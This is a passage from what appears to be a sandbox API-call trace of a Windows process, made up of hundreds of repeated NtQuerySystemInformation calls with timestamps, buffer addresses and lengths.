SystemInformation=0xf7a68fc9e0, Length=0x20, ResultLength=0x0) [0272.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x20, ResultLength=0x0) [0272.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x20, ResultLength=0x0) [0272.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc48, Length=0x58, ResultLength=0x0) [0272.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x38, ResultLength=0x0) [0272.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0272.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0272.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0272.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0272.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9d0, Length=0x28, ResultLength=0x0) [0272.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x38, ResultLength=0x0) [0272.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x38, ResultLength=0x0) [0272.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0272.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0272.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x38, ResultLength=0x0) [0272.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x38, ResultLength=0x0) [0272.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x20, ResultLength=0x0) [0272.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0272.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0272.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0272.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x20, ResultLength=0x0) [0272.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x38, ResultLength=0x0) [0272.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0272.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x20, ResultLength=0x0) [0272.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x20, ResultLength=0x0) [0272.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x20, ResultLength=0x0) [0272.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x38, ResultLength=0x0) [0272.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0272.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x20, ResultLength=0x0) [0272.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x20, ResultLength=0x0) [0272.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x20, ResultLength=0x0) [0272.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x38, ResultLength=0x0) [0272.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0272.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0272.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0272.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc48, Length=0x58, ResultLength=0x0) [0272.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x58, ResultLength=0x0) [0272.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0272.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0272.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0272.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0272.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0272.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x28, ResultLength=0x0) [0272.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0272.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x28, ResultLength=0x0) [0272.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x28, ResultLength=0x0) [0272.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0272.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8b0, Length=0x20, ResultLength=0x0) [0272.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x20, ResultLength=0x0) [0272.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x20, ResultLength=0x0) [0272.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x20, ResultLength=0x0) [0272.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0272.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8b0, Length=0x20, ResultLength=0x0) [0272.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0272.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0272.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x58, ResultLength=0x0) [0272.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0272.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0272.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0272.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0272.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0272.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x28, ResultLength=0x0) [0272.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0272.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x28, ResultLength=0x0) [0272.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x28, ResultLength=0x0) [0272.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7f0, Length=0x20, ResultLength=0x0) [0272.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc770, Length=0x20, ResultLength=0x0) [0272.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc770, Length=0x20, ResultLength=0x0) [0272.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc770, Length=0x20, ResultLength=0x0) [0272.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0272.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0272.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8b0, Length=0x20, ResultLength=0x0) [0272.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0272.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0272.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x58, ResultLength=0x0) [0272.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0272.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0272.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0272.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0272.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0272.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x28, ResultLength=0x0) [0272.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0272.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x28, ResultLength=0x0) [0272.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x28, ResultLength=0x0) [0272.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0272.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8b0, Length=0x20, ResultLength=0x0) [0272.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x20, ResultLength=0x0) [0272.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.527] 